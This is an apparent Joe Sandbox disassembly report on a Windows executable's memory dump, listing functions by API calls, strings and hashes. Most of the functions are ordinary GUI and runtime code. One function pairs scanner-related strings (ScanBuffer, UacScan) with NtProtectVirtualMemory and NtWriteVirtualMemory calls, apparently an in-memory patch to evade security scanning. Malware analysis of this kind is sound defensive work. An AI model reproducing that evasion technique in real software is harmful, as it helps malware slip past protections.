Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
String ID:
API String ID: 3867285559-0
Opcode ID: ba1f7bab0bbb52822a824d4030fce0a0468124b1a396f16c32fe5c6ba0d9cc5e
Instruction ID: 74f79620ad989fae9310583b67b7313c235f9ec455884ac16ed83e11c93051b1
Opcode Fuzzy Hash: ba1f7bab0bbb52822a824d4030fce0a0468124b1a396f16c32fe5c6ba0d9cc5e
Instruction Fuzzy Hash: C441C975B00204ABDB14EBA8CDC4B9EB7F8EB49709F1084A9B909DB281DB75ED05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04136E84 Relevance: 16.6, APIs: 11, Instructions: 91COMMON

Download Yara Rule

APIs

IsWindowUnicode.USER32(?), ref: 04136E9E
SetWindowLongW.USER32(?,000000FC,?), ref: 04136EB9
GetWindowLongW.USER32(?,000000F0), ref: 04136EC4
GetWindowLongW.USER32(?,000000F4), ref: 04136ED6
SetWindowLongW.USER32(?,000000F4,?), ref: 04136EE9
SetWindowLongA.USER32(?,000000FC,?), ref: 04136F02
GetWindowLongA.USER32(?,000000F0), ref: 04136F0D
GetWindowLongA.USER32(?,000000F4), ref: 04136F1F
SetWindowLongA.USER32(?,000000F4,?), ref: 04136F32
SetPropA.USER32(?,00000000,00000000), ref: 04136F49
SetPropA.USER32(?,00000000,00000000), ref: 04136F60

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Window$Long$Prop$Unicode
String ID:
API String ID: 1693715928-0
Opcode ID: 236349be675f95289b80407340b2a3cfae66be58a44a26b1737455f0068c9786
Instruction ID: 599ae596f58d1108eddae5e2efa69548f298edac9783f0e61e91c3d2ad7b95b5
Opcode Fuzzy Hash: 236349be675f95289b80407340b2a3cfae66be58a44a26b1737455f0068c9786
Instruction Fuzzy Hash: 4A319A75504258BBEF10DF99DC94EAA37ECAB09268F108650FE24CB2D1D774F940DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0415AE00 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 420libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,UacScan,0419A350,0415B464,OpenSession,0419A350,0415B464,ScanBuffer,0419A350,0415B464,00000000,0415B44C), ref: 0415AF47
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0415AF4D

Part of subcall function 0411FD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,0411FE14), ref: 0411FD70
Part of subcall function 0411FD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FD7E
Part of subcall function 0411FD38: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 0411FD97
Part of subcall function 0411FD38: GetCurrentProcess.KERNEL32(0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FDB3
Part of subcall function 0411FD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FDB9
Part of subcall function 0411FD38: GetCurrentProcess.KERNEL32(0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0411FDE3
Part of subcall function 0411FD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000), ref: 0411FDE9
Part of subcall function 0411FD38: FreeLibrary.KERNEL32(74AD0000,00000000,0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000), ref: 0411FDF4

Strings

ScanBuffer, xrefs: 0415AE39, 0415B013, 0415B136, 0415B253, 0415B3C2
C:\Windows\System32\ntdll.dll, xrefs: 0415AF42
UacScan, xrefs: 0415AEEB
UacInitialize, xrefs: 0415AF61, 0415B0CB, 0415B1E2
ScanString, xrefs: 0415B072
NtWriteVirtualMemory, xrefs: 0415AF3D
OpenSession, xrefs: 0415AE92, 0415AFBA, 0415B2C4, 0415B351

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: AddressCurrentHandleLibraryMemoryModuleProcProcessVirtual$FreeLoadProtectWrite
String ID: C:\Windows\System32\ntdll.dll$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
API String ID: 327143009-4174081549
Opcode ID: ef74555b1958a30fecbe061b0427957c6ce93d11f6eabbb6892b2de35df285e5
Instruction ID: e722cd9836957e4da6a97a9e8ad2276f71dd2a5b411a140ca2cb27616f868b8e
Opcode Fuzzy Hash: ef74555b1958a30fecbe061b0427957c6ce93d11f6eabbb6892b2de35df285e5
Instruction Fuzzy Hash: 0DF12C31A01119DBEB14EBA4C9C0FDEB3B9EF44208F11C1B5E609AB264DB70BE468F55

Uniqueness

Uniqueness Score: -1.00%

Function 0413FA8C Relevance: 15.2, APIs: 10, Instructions: 227windowCOMMON

Download Yara Rule

APIs

RectVisible.GDI32(00000000,?), ref: 0413FBA4
SaveDC.GDI32(00000000), ref: 0413FBC7
IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 0413FC07
RestoreDC.GDI32(00000000,00000000), ref: 0413FC33

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Rect$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 1976014923-0
Opcode ID: 0dc8e4228785b1b3e06613f681e9dc6f19657e2bcf3b79742d45b4a14b69fdf3
Instruction ID: 9c14e2b3c0f2b33f4b09b98e2497d9a3dc9bc38d586cbc364b3093fc456c3e5a
Opcode Fuzzy Hash: 0dc8e4228785b1b3e06613f681e9dc6f19657e2bcf3b79742d45b4a14b69fdf3
Instruction Fuzzy Hash: 8991E474A042499FDB05DFA8C4C4FAEBBF8AF08314F1440E5EA44AB296D775E985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0414F0F8 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 0414F143
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 0414F161
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0414F16E
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0414F17B
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0414F188
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 0414F195
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0414F1A2
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0414F1AF
EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 0414F1CD
EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 0414F1E9

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: 23241799ec2803eb5caea310ee41a3751ad6447c0d39fecbfe55116c129a1b39
Instruction ID: 4fbd0cbc6265a458143d94e133916b82897d462750baff5a986f62192ed57d16
Opcode Fuzzy Hash: 23241799ec2803eb5caea310ee41a3751ad6447c0d39fecbfe55116c129a1b39
Instruction Fuzzy Hash: 2521EF70384354BAF720EB28CCCDF597BD99B14B18F0580A0B6486F6D2C7F5BA518714

Uniqueness

Uniqueness Score: -1.00%

Function 041025CA Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

The unexpected small block leaks are:, xrefs: 041027A3
An unexpected memory leak has occurred. , xrefs: 0410272C
Unexpected Memory Leak, xrefs: 0410295C
The sizes of unexpected leaked medium and large blocks are: , xrefs: 041028E5
7, xrefs: 0410273D
, xrefs: 041028B0
bytes: , xrefs: 041027F9

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: 4bf46c48399c5a3e2a02f48d306bec2353f8d49136998dc47e1d344966d329bb
Instruction ID: 39f6dd90a1ec27ffd7fb0225534553792f03e4c60d9c6c5cf853721897eb5aa3
Opcode Fuzzy Hash: 4bf46c48399c5a3e2a02f48d306bec2353f8d49136998dc47e1d344966d329bb
Instruction Fuzzy Hash: 2971A230A042688AEF31AA6CC8C8BD8B7E5EB0D714F1081E5D549EB2C1DBF5AD85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0413A170 Relevance: 13.7, APIs: 9, Instructions: 154COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,?,?), ref: 0413A1AB
MulDiv.KERNEL32(?,?,?), ref: 0413A1C5
MulDiv.KERNEL32(?,?,?), ref: 0413A1F3
MulDiv.KERNEL32(?,?,?), ref: 0413A209
MulDiv.KERNEL32(?,?,?), ref: 0413A241
MulDiv.KERNEL32(?,?,?), ref: 0413A259

Part of subcall function 041224FC: MulDiv.KERNEL32(00000000,00000048,?), ref: 0412250D

MulDiv.KERNEL32(?), ref: 0413A2B0
MulDiv.KERNEL32(?), ref: 0413A2DA
MulDiv.KERNEL32(00000000), ref: 0413A300

Part of subcall function 04122518: MulDiv.KERNEL32(00000000,?,00000048), ref: 04122525

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 287b33499852eafbc0311c5f82d8a6ea2fb69de1fc2b2f63e22b4a0d190331a0
Instruction ID: a4228eb8a1375c4343dea6dd7882c4e9df4d6d6f2b1d19fb7ac8858f33792c8d
Opcode Fuzzy Hash: 287b33499852eafbc0311c5f82d8a6ea2fb69de1fc2b2f63e22b4a0d190331a0
Instruction Fuzzy Hash: A3514BB0308750AFD320DA69C884A6ABBF9AF49385F04885DF9D6C7251C77AF840CB20

Uniqueness

Uniqueness Score: -1.00%

Function 04152A94 Relevance: 13.6, APIs: 9, Instructions: 132windowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 0411E97C: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0411E99A

GetClassInfoA.USER32(04100000,04152730,?), ref: 04152AF3
RegisterClassA.USER32(0416B650), ref: 04152B0B

Part of subcall function 0410669C: LoadStringA.USER32(00000000,0000FFF3,?,00001000), ref: 041066CE

SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 04152BA7
SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 04152BC9
SetClassLongA.USER32(0000000E,000000F2,00000000), ref: 04152BDC
GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,041499E0), ref: 04152BE7
DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,041499E0), ref: 04152BF6
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,041499E0), ref: 04152C03
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,041499E0), ref: 04152C1A

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
String ID:
API String ID: 2103932818-0
Opcode ID: 85b54578ab59b1be2217bd67ee96fec78fcd8769c24575504ec40465330ba2df
Instruction ID: 396e5bcb202a6bce84348475a6d4cde70015d394f3c62a3b76122e3ec14b1eda
Opcode Fuzzy Hash: 85b54578ab59b1be2217bd67ee96fec78fcd8769c24575504ec40465330ba2df
Instruction Fuzzy Hash: 71411A71644244AFF710EF69DDC1FA933A8AB09704F5185A4FE10DB2E6DBB5BC808B24

Uniqueness

Uniqueness Score: -1.00%

Function 0413B0F4 Relevance: 13.6, APIs: 9, Instructions: 122windowCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0413B12B
GetDCEx.USER32(?,00000000,00000402), ref: 0413B13E
SelectObject.GDI32(?,00000000), ref: 0413B161
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0413B187
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0413B1A9
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0413B1C8
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0413B1E2
SelectObject.GDI32(?,?), ref: 0413B1EF
ReleaseDC.USER32(?,?), ref: 0413B209

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: ObjectSelect$DesktopReleaseWindow
String ID:
API String ID: 1187665388-0
Opcode ID: 61512a84cdbf4a1c7a10ad4ce6a0504adfa7399c8664559f023958cc28e8a1ab
Instruction ID: 61e487593067d5ce4d50644a0110d4bdb17ce92c6ff4e3f42481ca7b2283543e
Opcode Fuzzy Hash: 61512a84cdbf4a1c7a10ad4ce6a0504adfa7399c8664559f023958cc28e8a1ab
Instruction Fuzzy Hash: 1031DAB6A00219AFDB01DEECCC85DAFBBBCFF09604B408565B554F7244D6B5AD048B60

Uniqueness

Uniqueness Score: -1.00%

Function 0410CFCC Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,0410D297,?,?,00000000,00000000), ref: 0410D002

Part of subcall function 0410B8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0410B8E2

Strings

m/d/yy, xrefs: 0410D0D1
:mm:ss, xrefs: 0410D252
mmmm d, yyyy, xrefs: 0410D0FE
AMPM , xrefs: 0410D225
AMPM, xrefs: 0410D216
:mm, xrefs: 0410D235

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 23dde4a08ef847f46d67133465f0ac0c7fc114045967871819186610dad56d11
Instruction ID: 438b1cd2911f4b70bff47975f620b0191eeef21d2765bee1b16fbe40a76a2ddf
Opcode Fuzzy Hash: 23dde4a08ef847f46d67133465f0ac0c7fc114045967871819186610dad56d11
Instruction Fuzzy Hash: 1B614E70B5414C9BFB10FAE4E9D0A9E77A5EB88208F14D839E100AB7C5CBB8FD459B51

Uniqueness

Uniqueness Score: -1.00%

Function 0413E58C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(?,?,?), ref: 0413E650
UnregisterClassA.USER32(?,?), ref: 0413E678
RegisterClassA.USER32(?), ref: 0413E68E
GetWindowLongA.USER32(00000000,000000F0), ref: 0413E6CA
GetWindowLongA.USER32(00000000,000000F4), ref: 0413E6DF
SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 0413E6F2

Strings

@, xrefs: 0413E5C5

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: ClassLongWindow$InfoRegisterUnregister
String ID: @
API String ID: 717780171-2766056989
Opcode ID: 65bef3b20a9b7c49ffe80f2103e14c7ff848038803821a811f4351003e10e4ae
Instruction ID: fb55efe64610c00fa91307530d5452438ee5cf692f15aad6c3a91dd6cde3bac3
Opcode Fuzzy Hash: 65bef3b20a9b7c49ffe80f2103e14c7ff848038803821a811f4351003e10e4ae
Instruction Fuzzy Hash: C6517C706003549BEB20EBA8CCC4BDE77F9AF05309F4085A9E859E72D1EB70B945CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0412AFD0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 0412B001
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0412B028
GetSystemMetrics.USER32(00000000), ref: 0412B03D
GetSystemMetrics.USER32(00000001), ref: 0412B048
lstrcpyA.KERNEL32(?,DISPLAY), ref: 0412B072

Part of subcall function 0412ACA4: GetProcAddress.KERNEL32(75A50000,00000000), ref: 0412AD23

Strings

GetMonitorInfo, xrefs: 0412AFE8
DISPLAY, xrefs: 0412B069

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfo
API String ID: 1539801207-1633989206
Opcode ID: 3ada01e7ef85b4f9a01adf08d6ebc208dfc59286ce3d824e98b184d7208343fa
Instruction ID: d74c3960fa9f6a48590927d220bd316e11720081b17df1d5bf656027db9e4636
Opcode Fuzzy Hash: 3ada01e7ef85b4f9a01adf08d6ebc208dfc59286ce3d824e98b184d7208343fa
Instruction Fuzzy Hash: 6B11E131B04720AFE721CF259A847A7B7F8EF05750F004529ED65D7240DBB8BC588BA4

Uniqueness

Uniqueness Score: -1.00%

Function 04104608 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,041046CF,?,?,041997C8,?,?,0416A7AC,041068FD,04169751), ref: 04104641
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,041046CF,?,?,041997C8,?,?,0416A7AC,041068FD,04169751), ref: 04104647
GetStdHandle.KERNEL32(000000F5,04104690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,041046CF,?,?,041997C8), ref: 0410465C
WriteFile.KERNEL32(00000000,000000F5,04104690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,041046CF,?,?), ref: 04104662
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 04104680

Strings

Error, xrefs: 04104674
Runtime error at 00000000, xrefs: 0410463A, 04104679

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: c8fbc3e3d8cef7f7454c6d913c69e826580f85bb540fe482451466238c888fa8
Instruction ID: 75ef87596165276cb5df5cf913f3b70af86957fbd52663284898c5631868ab6f
Opcode Fuzzy Hash: c8fbc3e3d8cef7f7454c6d913c69e826580f85bb540fe482451466238c888fa8
Instruction Fuzzy Hash: 54F030716A43C0B5FA24B6506CC5FD927689B46F29F24C749F360A80C1ABEDBCC49F25

Uniqueness

Uniqueness Score: -1.00%

Function 04155ED0 Relevance: 12.2, APIs: 8, Instructions: 170windowCOMMON

Download Yara Rule

APIs

ImageList_DrawEx.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 04155F2F
ImageList_DrawEx.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 04155FD0
SetTextColor.GDI32(00000000,00FFFFFF), ref: 0415601D
SetBkColor.GDI32(00000000,00000000), ref: 04156025
BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 0415604A

Part of subcall function 04155EA8: ImageList_GetBkColor.COMCTL32(00000000,?,04155F09,00000000,?), ref: 04155EBE

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: ColorImageList_$Draw$Text
String ID:
API String ID: 2027629008-0
Opcode ID: 92572ab2cd5c720ba2e899adb0b4c01a32bd45ad09c3211a037dce391de4f121
Instruction ID: 2f58d1a2726c91157aa1b83666bfb24f804deec8eea9e48f1aafa09f08cf45d6
Opcode Fuzzy Hash: 92572ab2cd5c720ba2e899adb0b4c01a32bd45ad09c3211a037dce391de4f121
Instruction Fuzzy Hash: DD51F271740219BFEB54EF68CEC1F9E77A9AF08218F140160BA14EB296CB74FC518B65

Uniqueness

Uniqueness Score: -1.00%

Function 041506A4 Relevance: 12.2, APIs: 8, Instructions: 154windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 04150715
GetCapture.USER32 ref: 04150724
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 0415072A
ReleaseCapture.USER32 ref: 0415072F
GetActiveWindow.USER32 ref: 04150780
SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 04150816
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 04150883
GetActiveWindow.USER32 ref: 04150892

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: 0e8d4f9ae9e8721f25eb3898d58268e664dda836969ff67d971401129f1cfc85
Instruction ID: 1d4711def52743ada081fb0e143caf45291c29ef2855b4b4cdda61b371fc99e8
Opcode Fuzzy Hash: 0e8d4f9ae9e8721f25eb3898d58268e664dda836969ff67d971401129f1cfc85
Instruction Fuzzy Hash: 29510A30A00284EFEB15EFA5C9C6B9D7BF5EF49704F1540A4E814AB2A1DB75BE84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0413FD5C Relevance: 12.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

SaveDC.GDI32(?), ref: 0413FD79

Part of subcall function 04138B74: GetWindowOrgEx.GDI32(00000000), ref: 04138B82
Part of subcall function 04138B74: SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 04138B98

IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0413FDB2
GetWindowLongA.USER32(00000000,000000EC), ref: 0413FDC6
GetWindowLongA.USER32(00000000,000000F0), ref: 0413FDE7
SetRect.USER32(?,00000000,00000000,?,?), ref: 0413FE17
DrawEdge.USER32(?,?,00000000,00000000), ref: 0413FE26
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0413FE4F
RestoreDC.GDI32(?,?), ref: 0413FECE

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
